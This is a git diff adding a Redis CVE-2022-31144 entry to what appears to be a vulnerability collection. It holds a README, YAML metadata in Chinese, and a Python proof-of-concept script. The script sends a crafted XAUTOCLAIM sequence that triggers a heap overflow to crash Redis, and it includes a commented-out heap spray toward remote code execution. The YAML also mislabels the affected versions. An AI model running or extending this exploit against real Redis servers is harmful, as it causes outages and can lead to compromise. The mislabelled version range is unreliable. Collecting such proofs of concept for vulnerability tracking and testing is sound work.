diff --git a/cve/redis/2022/CVE-2022-31144/README.md b/cve/redis/2022/CVE-2022-31144/README.md new file mode 100644 index 0000000000000000000000000000000000000000..a8dddf66b6e8b2bd98cda34b7b0b5bffc1eae3d7 --- /dev/null +++ b/cve/redis/2022/CVE-2022-31144/README.md @@ -0,0 +1,3 @@ +# CVE-2022-31144 +CVE-2022-31144 dos 4redis. +Rce not finished yet or too soon, this can be turned into rce but oh well if you smart enough diff --git a/cve/redis/2022/CVE-2022-31144/ab.py b/cve/redis/2022/CVE-2022-31144/ab.py new file mode 100644 index 0000000000000000000000000000000000000000..c60987f0f0e3c5ff01f941a95323becc72ad5515 --- /dev/null +++ b/cve/redis/2022/CVE-2022-31144/ab.py @@ -0,0 +1,34 @@ +import redis +def spray(): + for i in range(0,500): + user_connection.set("fillerA"+str(i),"A"*256) + user_connection.set("fillerB"+str(i),"B"*256) + user_connection.set("fillerC"+str(i),"C"*256) + +def create_group( skey, gname ): + try: + user_connection.xgroup_create( name=skey, groupname=gname, id="$", mkstream=True ) + except redis.ResponseError as e: + print(f"raised: {e}") + + +user_connection = redis.Redis(host='localhost', port=6379, password='', decode_responses=True) +x = user_connection.ping() +if x == True: + create_group("s:foo","g:foo") + user_connection.xadd("s:foo",{"foo":1},maxlen=1,approximate=True) + user_connection.xadd("s:foo",{"foo":2},maxlen=1,approximate=True) + user_connection.xadd("s:foo",{"foo":3},maxlen=1,approximate=True) + user_connection.xadd("s:foo",{"foo":4},maxlen=1,approximate=True) + user_connection.xadd("s:foo",{"foo":5},maxlen=1,approximate=True) + print(user_connection.xreadgroup("g:foo","c:1",count=1,streams={"s:foo":">"})) + print(user_connection.xreadgroup("g:foo","c:1",count=1,streams={"s:foo":">"})) + print(user_connection.xreadgroup("g:foo","c:1",count=1,streams={"s:foo":">"})) + print(user_connection.xreadgroup("g:foo","c:1",count=1,streams={"s:foo":">"})) + print(user_connection.xreadgroup("g:foo","c:1",count=1,streams={"s:foo":">"})) + user_connection.xtrim("s:foo",maxlen=1) + print(user_connection.xreadgroup("g:foo","c:1",count=10,streams={"s:foo":"0"})) + user_connection.xautoclaim("s:foo","g:foo","c:1",10,0,count=100000000000000000) + #spray() + #for i in range(200,500,i+2): + # user_connection.delete("fillerA"+str(i)) diff --git a/cve/redis/2022/yaml/CVE-2022-31144.yaml b/cve/redis/2022/yaml/CVE-2022-31144.yaml new file mode 100644 index 0000000000000000000000000000000000000000..7b5dcafb09241e93300148bc8eebd76245c3bdd1 --- /dev/null +++ b/cve/redis/2022/yaml/CVE-2022-31144.yaml @@ -0,0 +1,24 @@ +id: CVE-2022-31144 +source: + https://github.com/SpiralBL0CK/CVE-2022-31144 +info: + name: Redis是著名的开源Key-Value数据库, 其具备在沙箱中执行Lua脚本的能力. + severity: High + description: | + Redis 是一个内存中数据库, 它保留在磁盘上. 在特定状态下对流密钥的特制“XAUTOCLAIM”命令可能会导致堆溢出, 并可能导致远程代码执行. 此问题会影响 7.7.0 之前的 4.x 分支上的版本. 该修补程序在版本 7.0.4 中发布. + scope-of-influence: + 7.0 <= redis < 7.0.4 + reference: + - https://github.com/redis/redis/releases/tag/7.0.4 + - https://nvd.nist.gov/vuln/detail/CVE-2022-31144 + - https://github.com/redis/redis/security/advisories/GHSA-96f7-42fg-2jrh + - https://security.gentoo.org/glsa/202209-17 + - https://security.netapp.com/advisory/ntap-20220909-0002/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2022-31144 + cwe-id: CWE-787, CWE-122 + cnvd-id: None + kve-id: None + tags: 堆溢出, 远程代码执行 \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 16958e20ec758cb996faa1b233ddaa9add90d71f..a084eeda25cb0fe310106410fc1a7e6d7d357263 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -82,6 +82,8 @@ cve: - CVE-2021-3517 - CVE-2021-3518 - CVE-2021-3537 + redis: + - CVE-2022-31144 cnvd: kve: kylin-software-properties: